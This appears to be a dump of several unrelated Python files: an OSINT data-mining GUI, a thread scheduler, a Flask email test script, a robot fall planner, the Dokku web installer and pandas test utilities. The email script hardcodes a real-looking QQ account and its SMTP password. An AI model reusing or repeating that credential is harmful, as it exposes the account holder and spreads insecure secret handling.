self.selector.bind("<<ComboboxSelected>>", self.run_data_mining)
self.selector.bind("<Return>", self.run_data_mining)
self.selector.bind("<ButtonRelease-1>", self.config_menu)
self.treeview.bind('<ButtonRelease-1>', self.selectItem)
self.bind_all('<Control-r>', self.run_data_mining)
# focus on entry widget
self.entry.focus()
def config_menu(self, event=None):
"""Ensures search menu option is properly enabled and disabled"""
if self.multi_select.get():
self.run.entryconfig("Run Transform", state="disabled")
elif self.selector.get() == "":
self.run.entryconfig("Run Transform", state="disabled")
else:
self.run.entryconfig("Run Transform", state="active")
def validate_input(self, event=None):
"""Validates and sanitizes user input"""
self.validator = InputValidator()
_input = self.entry.get()
if _input:
validated_input = self.validator.validate(_input)[-1]
if validated_input[0]:
self.status['text'] = validated_input[1]
self.selector['values'] = validated_input[2]
self.selector.current(0)
self.selector.focus()
self.config_menu()
else:
self.selector["values"] = [""]
self.selector.set("")
self.run.entryconfig("Run Transform", state="disabled")
self.status['text'] = "input: invalid"
elif not _input:
self.status['text'] = "ready"
self.selector["values"] = [""]
self.run.entryconfig("Run Transform", state="disabled")
self.selector.current(0)
def run_data_mining(self, event=None):
"""Performs the select OSINT data mining operation"""
self.finished = False
if self.multi_select.get():
self.transforms_tracker.add(self.selector.get())
self.status['text'] = "multi-select: [{}]".format(" - ".join([transform for transform in self.transforms_tracker]))
else:
self.status['text'] = "running..."
_input = self.entry.get().split(",")
if _input[0]:
transform = self.selector.get()
self.transforms_tracker.add(transform)
try:
t = Thread(target=self.run_transform, args=(_input, self.transforms_tracker,))
t.daemon = True
t.start()
self.check_status()
self.entry.focus()
self.status['text'] = "ready"
self.transforms_tracker.clear()
except Exception as e:
messagebox.showerror("Error", "Error message:" + str(e))
else:
self.status['text'] = "no inputs"
def run_transform(self, _input, transforms):
"""Run lisf of transforms on input data"""
transform_executed = str
try:
for i in _input:
for transform in transforms:
transform_executed = transform
data = self.validator.execute_transform(i, transform)
for item in data:
self.treeview.insert(self.getID(i), "end", values=(transform, item))
self.finished = True
except Exception as e:
self.finished = True
self.status['text'] = "transform failed"
messagebox.showerror("Error",
"Error during transform [{}] \nError message: {}".format(transform_executed, str(e)))
def check_status(self):
"""Checks if the transform thread has finished executing"""
while self.finished is False:
root.update()
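# Note: this busy-wait pumps Tk events with root.update() so the GUI stays
# responsive while the transform thread runs; a gentler alternative (sketch)
# would be polling via root.after(100, ...) instead of a tight loop.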
def getID(self, item):
"""Grabs the ID of the queried treeview item"""
if item in self.id_tracker.keys():
return self.id_tracker[item]
else:
_id = self.treeview.insert('', "end", text=item)
self.id_tracker[item] = _id
return _id
def selectItem(self, event=None):
"""Selects item in treeview and inserts in search box"""
curItem = self.treeview.identify("item", event.x, event.y)
self.entry.delete(0, 'end')
try:
if self.treeview.item(curItem)["text"]:
self.entry.insert(0, self.treeview.item(curItem)["text"])
self.entry.insert(0, self.treeview.item(curItem)["values"][1])
except IndexError:
pass
self.validate_input()
def view_credits(self):
"""Opens a new window providing credits information"""
# launch window and configure window settings
self.win_credits = CreditsTool()
if sys.platform == "win32":
self.win_credits.title('')
else:
self.win_credits.title('Credits')
self.win_credits.geometry('+%d+%d' % (root.winfo_x() +
20, root.winfo_y() + 20))
self.win_credits.geometry("160x100")
if sys.platform == "win32":
self.win_credits.iconbitmap(self.icon)
self.win_credits.resizable(width=False, height=False)
# set focus on window
self.win_credits.grab_set()
self.win_credits.focus()
# start mainloop
self.win_credits.mainloop()
def manage_apis(self):
"""Opens a new window allowing user to manage api keys"""
# launch window and configure window settings
self.api_tool = ApiTool()
self.api_tool.title('Manage APIs')
self.api_tool.geometry('+%d+%d' % (root.winfo_x() +
20, root.winfo_y() + 20))
if sys.platform == "win32":
self.api_tool.iconbitmap(self.icon)
self.api_tool.resizable(width=False, height=False)
self.api_tool.protocol('WM_DELETE_WINDOW', self.api_tool.close_window)
# set focus on window
self.api_tool.grab_set()
self.api_tool.focus()
# start mainloop
self.api_tool.mainloop()
def grab_investigation_data(self):
""""Stores investigation data"""
data = {}
for Parent in self.treeview.get_children():
data[self.treeview.item(Parent)["text"]]=[]
for child in self.treeview.get_children(Parent):
if self.treeview.item(child)["values"] not in data[self.treeview.item(Parent)["text"]]:
data[self.treeview.item(Parent)["text"]].append(self.treeview.item(child)["values"])
return data
def save_investigation(self):
"""Saves investigation data"""
if not self.investigation_id_tracker:
self.investigation_id_tracker = datetime.datetime.now().strftime("%Y-%m-%d_%H:%M")
data = self.grab_investigation_data()
self.save = SaveTool(investigation_id=self.investigation_id_tracker, data=data)
self.save.title('Save investigation')
self.save.geometry('+%d+%d' % (root.winfo_x() +
20, root.winfo_y() + 20))
if sys.platform == "win32":
self.save.iconbitmap(self.icon)
self.save.resizable(width=False, height=False)
self.save.protocol('WM_DELETE_WINDOW', self.save.quit_save)
# set focus on window
self.save.grab_set()
self.save.focus()
# start mainloop
self.save.mainloop()
def open_investigation(self):
"""Open investigation data"""
db = Database()
investigation_ids = db.retrieve_investigation_ids()
if not investigation_ids:
messagebox.showinfo("No saved investigations", "Please save an investigation before loading data")
db.close_connection()
if investigation_ids:
# clear investigation id
self.investigation_id_tracker = ""
self.open = OpenTool()
self.open.title('Open investigation')
self.open.geometry('+%d+%d' % (root.winfo_x() +
20, root.winfo_y() + 20))
if sys.platform == "win32":
self.open.iconbitmap(self.icon)
self.open.resizable(width=False, height=False)
self.open.protocol('WM_DELETE_WINDOW', self.open.quit_open)
# set focus on window
self.open.grab_set()
self.open.focus()
# start mainloop
self.open.mainloop()
def delete_investigation(self):
"""Delete investigation data"""
self.delete = DeleteTool()
self.delete.title('Delete investigation')
self.delete.geometry('+%d+%d' % (root.winfo_x() +
20, root.winfo_y() + 20))
if sys.platform == "win32":
self.delete.iconbitmap(self.icon)
self.delete.resizable(width=False, height=False)
self.delete.protocol('WM_DELETE_WINDOW', self.delete.quit)
# set focus on window
self.delete.grab_set()
self.delete.focus()
# start mainloop
self.delete.mainloop()
def clear_investigation_data(self, event=None):
"""Clears investigation data from treeview"""
self.treeview.delete(*self.treeview.get_children())
self.id_tracker = {}
self.entry.delete(0, "end")
self.validate_input()
@staticmethod
def quit_program():
"""Quits main program window"""
root.destroy()
if __name__ == '__main__':
root = tk.Tk()
root.title("POCKINT v.{}".format(__version__))
pockint = Gui(root)
root.config(menu=pockint.top)
pockint.pack(expand=False)
if sys.platform == "win32":
root.iconbitmap(pockint.icon)
root.protocol('WM_DELETE_WINDOW', pockint.quit_program)
root.mainloop()
|
scheduler.py | from future import standard_library
standard_library.install_aliases()
from builtins import object
import threading
from time import time
import random
import queue
from ..common import log
class Scheduler(object):
"""
A simple scheduler which schedules the periodic or once event
"""
import sortedcontainers as sc
max_delay_time = 60
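# Assumed job interface (a sketch inferred from usage below, not enforced):
# jobs are callable and provide get_expiration(), get_interval(),
# update_expiration(), set_initial_due_time(t), stop() and stopped(), and they
# sort by expiration time so the SortedSet keeps the soonest job first.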
def __init__(self):
self._jobs = Scheduler.sc.SortedSet()
self._wakeup_q = queue.Queue()
self._lock = threading.Lock()
self._thr = threading.Thread(target=self._do_jobs)
self._thr.daemon = True
self._started = False
def start(self):
"""
Start the scheduler, which starts the internal thread for scheduling
jobs. Please call tear_down() when doing cleanup
"""
if self._started:
log.logger.info("Scheduler already started.")
return
self._started = True
self._thr.start()
def tear_down(self):
"""
Stop the scheduler, which stops the internal thread for scheduling
jobs.
"""
if not self._started:
log.logger.info("Scheduler already tear down.")
return
self._wakeup_q.put(True)
def _do_jobs(self):
while True:
(sleep_time, jobs) = self.get_ready_jobs()
self._do_execution(jobs)
try:
done = self._wakeup_q.get(timeout=sleep_time)
except queue.Empty:
pass
else:
if done:
break
self._started = False
log.logger.info("Scheduler exited.")
def get_ready_jobs(self):
"""
@return: a 2 element tuple. The first element is the next ready
duration. The second element is ready jobs list
"""
now = time()
ready_jobs = []
sleep_time = 1
with self._lock:
job_set = self._jobs
total_jobs = len(job_set)
for job in job_set:
if job.get_expiration() <= now:
ready_jobs.append(job)
if ready_jobs:
del job_set[:len(ready_jobs)]
for job in ready_jobs:
if job.get_interval() != 0 and not job.stopped():
# repeated job, calculate next due time and enqueue
job.update_expiration()
job_set.add(job)
if job_set:
sleep_time = job_set[0].get_expiration() - now
if sleep_time < 0:
log.logger.warn("Scheduler satuation, sleep_time=%s",
sleep_time)
sleep_time = 0.1
if ready_jobs:
log.logger.info("Get %d ready jobs, next duration is %f, "
"and there are %s jobs scheduling",
len(ready_jobs), sleep_time, total_jobs)
ready_jobs.sort(key=lambda job: job.get("priority", 0), reverse=True)
return (sleep_time, ready_jobs)
def add_jobs(self, jobs):
with self._lock:
now = time()
job_set = self._jobs
for job in jobs:
delay_time = random.randrange(0, self.max_delay_time)
job.set_initial_due_time(now + delay_time)
job_set.add(job)
self._wakeup()
def update_jobs(self, jobs):
with self._lock:
job_set = self._jobs
for njob in jobs:
job_set.discard(njob)
job_set.add(njob)
self._wakeup()
def remove_jobs(self, jobs):
with self._lock:
job_set = self._jobs
for njob in jobs:
njob.stop()
job_set.discard(njob)
self._wakeup()
def number_of_jobs(self):
with self._lock:
return len(self._jobs)
def disable_randomization(self):
self.max_delay_time = 1
def _wakeup(self):
self._wakeup_q.put(None)
def _do_execution(self, jobs):
for job in jobs:
job()
|
test_email.py | from threading import Thread
from flask import Flask
from flask_mail import Mail,Message
app = Flask(__name__)
app.debug=True
app.config["MAIL_SERVER"] = "smtp.qq.com"
app.config["MAIL_PORT"] = 465
app.config["MAIL_USE_SSL"] = True
app.config["MAIL_USERNAME"] = "2364839934@qq.com"
app.config["MAIL_PASSWORD"] = "oycimssoihqkdhie"
mail = Mail(app)
@app.route("/send_mail")
def send_mail():
message = Message("title",sender=app.config["MAIL_USERNAME"],recipients=["2364839934@qq.com"])
message.body = "content"
t = Thread(target=_send_email,args=(message,))
t.start()
return "succ"
def _send_email(msg):
with app.app_context():
mail.send(msg)
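# Note: mail.send() must run inside an application context because Flask-Mail
# reads the MAIL_* settings from app.config; sending in a worker thread keeps
# the request handler from blocking on the SMTP round-trip. The imports below
# are only used by the raw-smtplib variant kept in the triple-quoted block at
# the end of this file.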
import smtplib
from email.mime.text import MIMEText
from email.header import Header
if __name__ == "__main__":
app.run(host='0.0.0.0',port=5002)
pass
'''
sender = '2364839934@qq.com'
receiver = sender
subject = 'python email test'
smtpserver = 'smtp.qq.com'
username = sender
password = 'oycimssoihqkdhie'
msg = MIMEText( 'Hello Python', 'text', 'utf-8' )
msg['Subject'] = Header( subject, 'utf-8' )
smtp = smtplib.SMTP()
smtp.connect( smtpserver )
smtp.login( username, password )
smtp.sendmail( sender, receiver, msg.as_string() )
smtp.quit()
'''
|
rollover_planner.py | import os
import sys
import pinocchio
import crocoddyl
import numpy as np
import math
import subprocess
import threading
from humanoid import SimpleHumanoidGaitProblem, plotSolution
from visualizer import VisualModel
from simulator import HumanoidSimulator
from planner import Planner, OptimalPlanner
from simple_planner import SimpleKneePlanner
import time
import matplotlib.pyplot as plt
class RolloverPlanner(OptimalPlanner):
def __init__(self, x0, nq, nv, na, control_length, contact_index=1, timeStep=1e-3, display=False):
super(RolloverPlanner, self).__init__(x0, nq, nv, na, control_length, contact_index, timeStep, display)
def forward(self, model, handLength, timeLength):
def showGepetto():
subprocess.call(["gepetto-gui"])
if self.display:
try:
thread = threading.Thread(target=showGepetto)
thread.start()
time.sleep(1)
#thread.join()
except Exception:
print("Error: unable to start Gepetto-GUI thread")
# Setting up contact timings
timeStep = self.timeStep
flyingKnots = self.bc_length
groundKnots = self.ac_length
# Setting up contact position
handLength = handLength
# Setting up falling problem
torso = 'base_link'
lFoot, rFoot = 'l_foot', 'r_foot'
lKneePoint, rKneePoint, rKneePoint1 = 'l_knee_lp', 'r_knee_rp', 'r_knee_lp'
lHandPoint, rHandPoint = 'l_hand_dp', 'r_hand_dp'
q0 = self.x0[:self.nq].copy()
gait = SimpleHumanoidGaitProblem(model.model, q0, torso, lFoot, rFoot,lKneePoint, rKneePoint, rKneePoint1, lHandPoint, rHandPoint)
# Setting up all tasks
problem = gait.createRolloverFallProblem(self.x0, handLength, timeLength, timeStep, groundKnots, flyingKnots, final=False)
endEffectors = [lKneePoint, rKneePoint,lHandPoint, rHandPoint]
tauTraj, velTraj = self.solve(model, problem, endEffectors)
return tauTraj, velTraj
def test():
pinocchio.switchToNumpyMatrix()
# Define simulation steps
horizon_length = 5000
time_step = 1e-3
# Define control trajectory steps
ctrl_time_step = 1e-2
# Load pinocchio model
m = VisualModel()
x0, nq, nv, na = m.x0, m.nq, m.nv, m.na
# Simple knee trajectory to initiate robot's movement
simpleKneePlanner = SimpleKneePlanner(x0, nq, nv, na, horizon_length)
kneeTraj = simpleKneePlanner.forward()
# Simulate static trajectory to obtain handLength and initial pose
s = HumanoidSimulator(horizon_length, display=False, timeStep=time_step)
s.initPose(x0, nq, nv, na)
_, _, _, _, _, x1, handLength, timeLength = s.simulate(m, kneeTraj, kneeTraj)
ctrl_horizon_length = timeLength//int(ctrl_time_step/time_step)
print('ctrl_length:%d'%ctrl_horizon_length)
# Plan optimal rollover trajectory
rolloverPlanner = RolloverPlanner(x1, nq, nv, na, ctrl_horizon_length*2, contact_index=ctrl_horizon_length, timeStep=ctrl_time_step, display=True)
tauRolloverTraj, velRolloverTraj = rolloverPlanner.forward(m, handLength, timeLength)
tauRolloverTraj_index = rolloverPlanner.contact_index
rolloverPlanner.saveTraj(np.matrix(tauRolloverTraj).T)
# # Simulate optimal rollover trajectory
# ss = HumanoidSimulator(horizon_length, display=True,timeStep=time_step)
# ss.initPose(x0, nq, nv, na)
# forceArr, comArr = ss.simulateOptTraj(m, kneeTraj, tauRolloverTraj,ctrlTimeStep=ctrl_time_step)
# # Plot simulated result
# ss.plot(forceArr,comArr)
if __name__ == "__main__":
test() |
dokku-installer.py | #!/usr/bin/env python2.7
import cgi
import json
import os
import re
import SimpleHTTPServer
import SocketServer
import subprocess
import sys
import threading
VERSION = 'v0.12.5'
hostname = ''
try:
command = "bash -c '[[ $(dig +short $HOSTNAME) ]] && echo $HOSTNAME || wget -q -O - icanhazip.com'"
hostname = subprocess.check_output(command, shell=True)
if ':' in hostname:
hostname = ''
except subprocess.CalledProcessError:
pass
key_file = os.getenv('KEY_FILE', '/root/.ssh/authorized_keys')
admin_keys = []
if os.path.isfile(key_file):
try:
command = "cat {0}".format(key_file)
admin_keys = subprocess.check_output(command, shell=True).strip().split("\n")
except subprocess.CalledProcessError:
pass
def check_boot():
if 'onboot' not in sys.argv:
return
init_dir = os.getenv('INIT_DIR', '/etc/init')
systemd_dir = os.getenv('SYSTEMD_DIR', '/etc/systemd/system')
nginx_dir = os.getenv('NGINX_DIR', '/etc/nginx/conf.d')
if os.path.exists(init_dir):
with open('{0}/dokku-installer.conf'.format(init_dir), 'w') as f:
f.write("start on runlevel [2345]\n")
f.write("exec {0} selfdestruct\n".format(os.path.abspath(__file__)))
if os.path.exists(systemd_dir):
with open('{0}/dokku-installer.service'.format(systemd_dir), 'w') as f:
f.write("[Unit]\n")
f.write("Description=Dokku web-installer\n")
f.write("\n")
f.write("[Service]\n")
f.write("ExecStart={0} selfdestruct\n".format(os.path.abspath(__file__)))
f.write("\n")
f.write("[Install]\n")
f.write("WantedBy=multi-user.target\n")
f.write("WantedBy=graphical.target\n")
if os.path.exists(nginx_dir):
with open('{0}/dokku-installer.conf'.format(nginx_dir), 'w') as f:
f.write("upstream dokku-installer { server 127.0.0.1:2000; }\n")
f.write("server {\n")
f.write(" listen 80;\n")
f.write(" location / {\n")
f.write(" proxy_pass http://dokku-installer;\n")
f.write(" }\n")
f.write("}\n")
subprocess.call('rm -f /etc/nginx/sites-enabled/*', shell=True)
sys.exit(0)
class GetHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
content = PAGE.replace('{VERSION}', VERSION)
content = content.replace('{HOSTNAME}', hostname)
content = content.replace('{ADMIN_KEYS}', "\n".join(admin_keys))
self.send_response(200)
self.end_headers()
self.wfile.write(content)
def do_POST(self):
if self.path not in ['/setup', '/setup/']:
return
params = cgi.FieldStorage(fp=self.rfile,
headers=self.headers,
environ={
'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': self.headers['Content-Type']})
vhost_enable = 'false'
dokku_root = os.getenv('DOKKU_ROOT', '/home/dokku')
if 'vhost' in params and params['vhost'].value == 'true':
vhost_enable = 'true'
with open('{0}/VHOST'.format(dokku_root), 'w') as f:
f.write(params['hostname'].value)
else:
try:
os.remove('{0}/VHOST'.format(dokku_root))
except OSError:
pass
with open('{0}/HOSTNAME'.format(dokku_root), 'w') as f:
f.write(params['hostname'].value)
for (index, key) in enumerate(params['keys'].value.splitlines(), 1):
user = 'admin'
if self.admin_user_exists() is not None:
user = 'web-admin'
if self.web_admin_user_exists() is not None:
index = int(self.web_admin_user_exists()) + 1
elif self.web_admin_user_exists() is None:
index = 1
elif self.admin_user_exists() is None:
pass
else:
index = int(self.admin_user_exists()) + 1
user = user + str(index)
command = ['sshcommand', 'acl-add', 'dokku', user]
proc = subprocess.Popen(command, stdin=subprocess.PIPE)
proc.stdin.write(key)
proc.stdin.close()
proc.wait()
set_debconf_selection('boolean', 'skip_key_file', 'true')
set_debconf_selection('boolean', 'vhost_enable', vhost_enable)
set_debconf_selection('boolean', 'web_config', 'false')
set_debconf_selection('string', 'hostname', params['hostname'].value)
if 'selfdestruct' in sys.argv:
DeleteInstallerThread()
self.send_response(200)
self.end_headers()
self.wfile.write(json.dumps({'status': 'ok'}))
def web_admin_user_exists(self):
return self.user_exists('web-admin(\d+)')
def admin_user_exists(self):
return self.user_exists('admin(\d+)')
def user_exists(self, name):
command = 'dokku ssh-keys:list'
pattern = re.compile(r'NAME="' + name + '"')
proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
max_num = 0
exists = False
for line in proc.stdout:
m = pattern.search(line)
if m:
# User of the form `user` or `user#` exists
exists = True
max_num = max(max_num, int(m.group(1)))
if exists:
return max_num
else:
return None
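# Sketch: user_exists(r'admin(\d+)') scans `dokku ssh-keys:list` for key names
# like admin1, admin2, ... and returns the highest numeric suffix, or None when
# no such key exists; the caller then picks the next free name.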
def set_debconf_selection(debconf_type, key, value):
found = False
with open('/etc/os-release', 'r') as f:
for line in f:
if 'debian' in line:
found = True
if not found:
return
ps = subprocess.Popen(['echo', 'dokku dokku/{0} {1} {2}'.format(
key, debconf_type, value
)], stdout=subprocess.PIPE)
try:
subprocess.check_output(['debconf-set-selections'], stdin=ps.stdout)
except subprocess.CalledProcessError:
pass
ps.wait()
class DeleteInstallerThread(object):
def __init__(self, interval=1):
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
command = "rm /etc/nginx/conf.d/dokku-installer.conf && /etc/init.d/nginx stop && /etc/init.d/nginx start"
try:
subprocess.call(command, shell=True)
except:
pass
command = "rm -f /etc/init/dokku-installer.conf /etc/systemd/system/dokku-installer.service && (stop dokku-installer || systemctl stop dokku-installer.service)"
try:
subprocess.call(command, shell=True)
except:
pass
def main():
check_boot()
port = int(os.getenv('PORT', 2000))
httpd = SocketServer.TCPServer(("", port), GetHandler)
print "Listening on 0.0.0.0:{0}, CTRL+C to stop".format(port)
httpd.serve_forever()
PAGE = """
<html>
<head>
<title>Dokku Setup</title>
<link rel="stylesheet" href="//netdna.bootstrapcdn.com/bootstrap/3.0.0/css/bootstrap.min.css" />
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
</head>
<body>
<div class="container" style="width: 640px;">
<form id="form" role="form">
<h1>Dokku Setup <small>{VERSION}</small></h1>
<div class="form-group">
<h3><small style="text-transform: uppercase;">Admin Access</small></h3>
<label for="key">Public Key</label><br />
<textarea class="form-control" name="keys" rows="7" id="key">{ADMIN_KEYS}</textarea>
</div>
<div class="form-group">
<h3><small style="text-transform: uppercase;">Hostname Configuration</small></h3>
<div class="form-group">
<label for="hostname">Hostname</label>
<input class="form-control" type="text" id="hostname" name="hostname" value="{HOSTNAME}" />
</div>
<div class="checkbox">
<label><input id="vhost" name="vhost" type="checkbox" value="true"> Use <abbr title="Nginx will be run on port 80 and backend to your apps based on hostname">virtualhost naming</abbr> for apps</label>
</div>
<p>Your app URLs will look like:</p>
<pre id="example">http://hostname:port</pre>
</div>
<button type="button" onclick="setup()" class="btn btn-primary">Finish Setup</button> <span style="padding-left: 20px;" id="result"></span>
</form>
</div>
<div id="error-output"></div>
<script>
function setup() {
if ($.trim($("#key").val()) == "") {
alert("Your admin public key cannot be blank.")
return
}
if ($.trim($("#hostname").val()) == "") {
alert("Your hostname cannot be blank.")
return
}
data = $("#form").serialize()
$("input,textarea,button").prop("disabled", true);
$.post('/setup', data)
.done(function() {
$("#result").html("Success!")
window.location.href = "http://dokku.viewdocs.io/dokku~{VERSION}/deployment/application-deployment/";
})
.fail(function(data) {
$("#result").html("Something went wrong...")
$("#error-output").html(data.responseText)
});
}
function update() {
if ($("#vhost").is(":checked") && $("#hostname").val().match(/^(\d{1,3}\.){3}\d{1,3}$/)) {
alert("In order to use virtualhost naming, the hostname must not be an IP but a valid domain name.")
$("#vhost").prop('checked', false);
}
if ($("#vhost").is(':checked')) {
$("#example").html("http://<app-name>."+$("#hostname").val())
} else {
$("#example").html("http://"+$("#hostname").val()+":<app-port>")
}
}
$("#vhost").change(update);
$("#hostname").change(update);
update();
</script>
</body>
</html>
"""
if __name__ == "__main__":
main()
|
__init__.py | from __future__ import annotations
import collections
from datetime import datetime
from decimal import Decimal
from functools import wraps
import operator
import os
import re
import string
from typing import (
TYPE_CHECKING,
Callable,
ContextManager,
Counter,
Iterable,
)
import warnings
import numpy as np
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
from pandas._typing import Dtype
from pandas.core.dtypes.common import (
is_datetime64_dtype,
is_datetime64tz_dtype,
is_float_dtype,
is_integer_dtype,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
is_unsigned_integer_dtype,
pandas_dtype,
)
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
NumericIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas._testing._io import ( # noqa:F401
close,
network,
round_trip_localpath,
round_trip_pathlib,
round_trip_pickle,
with_connectivity_check,
write_to_compressed,
)
from pandas._testing._random import ( # noqa:F401
randbool,
rands,
rands_array,
randu_array,
)
from pandas._testing._warnings import assert_produces_warning # noqa:F401
from pandas._testing.asserters import ( # noqa:F401
assert_almost_equal,
assert_attr_equal,
assert_categorical_equal,
assert_class_equal,
assert_contains_all,
assert_copy,
assert_datetime_array_equal,
assert_dict_equal,
assert_equal,
assert_extension_array_equal,
assert_frame_equal,
assert_index_equal,
assert_interval_array_equal,
assert_is_sorted,
assert_is_valid_plot_return_object,
assert_numpy_array_equal,
assert_period_array_equal,
assert_series_equal,
assert_sp_array_equal,
assert_timedelta_array_equal,
raise_assert_detail,
)
from pandas._testing.compat import get_dtype # noqa:F401
from pandas._testing.contexts import ( # noqa:F401
RNGContext,
decompress_file,
ensure_clean,
ensure_clean_dir,
ensure_safe_environment_variables,
set_timezone,
use_numexpr,
with_csv_dialect,
)
from pandas.core.api import (
Float64Index,
Int64Index,
UInt64Index,
)
from pandas.core.arrays import (
DatetimeArray,
PandasArray,
PeriodArray,
TimedeltaArray,
period_array,
)
if TYPE_CHECKING:
from pandas import (
PeriodIndex,
TimedeltaIndex,
)
_N = 30
_K = 4
UNSIGNED_INT_NUMPY_DTYPES: list[Dtype] = ["uint8", "uint16", "uint32", "uint64"]
UNSIGNED_INT_EA_DTYPES: list[Dtype] = ["UInt8", "UInt16", "UInt32", "UInt64"]
SIGNED_INT_NUMPY_DTYPES: list[Dtype] = [int, "int8", "int16", "int32", "int64"]
SIGNED_INT_EA_DTYPES: list[Dtype] = ["Int8", "Int16", "Int32", "Int64"]
ALL_INT_NUMPY_DTYPES = UNSIGNED_INT_NUMPY_DTYPES + SIGNED_INT_NUMPY_DTYPES
ALL_INT_EA_DTYPES = UNSIGNED_INT_EA_DTYPES + SIGNED_INT_EA_DTYPES
FLOAT_NUMPY_DTYPES: list[Dtype] = [float, "float32", "float64"]
FLOAT_EA_DTYPES: list[Dtype] = ["Float32", "Float64"]
COMPLEX_DTYPES: list[Dtype] = [complex, "complex64", "complex128"]
STRING_DTYPES: list[Dtype] = [str, "str", "U"]
DATETIME64_DTYPES: list[Dtype] = ["datetime64[ns]", "M8[ns]"]
TIMEDELTA64_DTYPES: list[Dtype] = ["timedelta64[ns]", "m8[ns]"]
BOOL_DTYPES: list[Dtype] = [bool, "bool"]
BYTES_DTYPES: list[Dtype] = [bytes, "bytes"]
OBJECT_DTYPES: list[Dtype] = [object, "object"]
ALL_REAL_NUMPY_DTYPES = FLOAT_NUMPY_DTYPES + ALL_INT_NUMPY_DTYPES
ALL_NUMPY_DTYPES = (
ALL_REAL_NUMPY_DTYPES
+ COMPLEX_DTYPES
+ STRING_DTYPES
+ DATETIME64_DTYPES
+ TIMEDELTA64_DTYPES
+ BOOL_DTYPES
+ OBJECT_DTYPES
+ BYTES_DTYPES
)
NULL_OBJECTS = [None, np.nan, pd.NaT, float("nan"), pd.NA, Decimal("NaN")]
NP_NAT_OBJECTS = [
cls("NaT", unit)
for cls in [np.datetime64, np.timedelta64]
for unit in [
"Y",
"M",
"W",
"D",
"h",
"m",
"s",
"ms",
"us",
"ns",
"ps",
"fs",
"as",
]
]
EMPTY_STRING_PATTERN = re.compile("^$")
# set testing_mode
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
# set the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
for category in _testing_mode_warnings:
warnings.simplefilter("always", category)
def reset_testing_mode():
# reset the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
for category in _testing_mode_warnings:
warnings.simplefilter("ignore", category)
set_testing_mode()
def reset_display_options():
"""
Reset the display options for printing and representing objects.
"""
pd.reset_option("^display.", silent=True)
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2) -> bool:
"""
Checks if the set of unique elements of arr1 and arr2 are equivalent.
"""
return frozenset(arr1) == frozenset(arr2)
def box_expected(expected, box_cls, transpose=True):
"""
Helper function to wrap the expected output of a test in a given box_class.
Parameters
----------
expected : np.ndarray, Index, Series
box_cls : {Index, Series, DataFrame}
Returns
-------
subclass of box_cls
"""
if box_cls is pd.array:
if isinstance(expected, RangeIndex):
# pd.array would return an IntegerArray
expected = PandasArray(np.asarray(expected._values))
else:
expected = pd.array(expected)
elif box_cls is Index:
expected = Index._with_infer(expected)
elif box_cls is Series:
expected = Series(expected)
elif box_cls is DataFrame:
expected = Series(expected).to_frame()
if transpose:
# for vector operations, we need a DataFrame to be a single-row,
# not a single-column, in order to operate against non-DataFrame
# vectors of the same length. But convert to two rows to avoid
# single-row special cases in datetime arithmetic
expected = expected.T
expected = pd.concat([expected] * 2, ignore_index=True)
elif box_cls is PeriodArray:
# the PeriodArray constructor is not as flexible as period_array
expected = period_array(expected)
elif box_cls is DatetimeArray:
expected = DatetimeArray(expected)
elif box_cls is TimedeltaArray:
expected = TimedeltaArray(expected)
elif box_cls is np.ndarray:
expected = np.array(expected)
elif box_cls is to_array:
expected = to_array(expected)
else:
raise NotImplementedError(box_cls)
return expected
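# Usage sketch (illustrative values):
#   box_expected(np.array([1, 2, 3]), Series)    # -> Series([1, 2, 3])
#   box_expected(np.array([1, 2, 3]), pd.array)  # -> IntegerArray([1, 2, 3])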
def to_array(obj):
# temporary implementation until we get pd.array in place
dtype = getattr(obj, "dtype", None)
if is_period_dtype(dtype):
return period_array(obj)
elif is_datetime64_dtype(dtype) or is_datetime64tz_dtype(dtype):
return DatetimeArray._from_sequence(obj)
elif is_timedelta64_dtype(dtype):
return TimedeltaArray._from_sequence(obj)
else:
return np.array(obj)
# -----------------------------------------------------------------------------
# Others
def getCols(k):
return string.ascii_uppercase[:k]
# make index
def makeStringIndex(k=10, name=None):
return Index(rands_array(nchars=10, size=k), name=name)
def makeUnicodeIndex(k=10, name=None):
return Index(randu_array(nchars=10, size=k), name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
"""make a length k index or n categories"""
x = rands_array(nchars=4, size=n)
return CategoricalIndex(
Categorical.from_codes(np.arange(k) % n, categories=x), name=name, **kwargs
)
def makeIntervalIndex(k=10, name=None, **kwargs):
"""make a length k IntervalIndex"""
x = np.linspace(0, 100, num=(k + 1))
return IntervalIndex.from_breaks(x, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
if k == 1:
return Index([True], name=name)
elif k == 2:
return Index([False, True], name=name)
return Index([False, True] + [False] * (k - 2), name=name)
def makeNumericIndex(k=10, name=None, *, dtype):
dtype = pandas_dtype(dtype)
assert isinstance(dtype, np.dtype)
if is_integer_dtype(dtype):
values = np.arange(k, dtype=dtype)
if is_unsigned_integer_dtype(dtype):
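            # shift values into the upper half of the unsigned range so they
            # cannot also be represented by the corresponding signed dtype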
values += 2 ** (dtype.itemsize * 8 - 1)
elif is_float_dtype(dtype):
values = np.random.random_sample(k) - np.random.random_sample(1)
values.sort()
values = values * (10 ** np.random.randint(0, 9))
else:
raise NotImplementedError(f"wrong dtype {dtype}")
return NumericIndex(values, dtype=dtype, name=name)
def makeIntIndex(k=10, name=None):
base_idx = makeNumericIndex(k, name=name, dtype="int64")
return Int64Index(base_idx)
def makeUIntIndex(k=10, name=None):
base_idx = makeNumericIndex(k, name=name, dtype="uint64")
return UInt64Index(base_idx)
def makeRangeIndex(k=10, name=None, **kwargs):
return RangeIndex(0, k, 1, name=name, **kwargs)
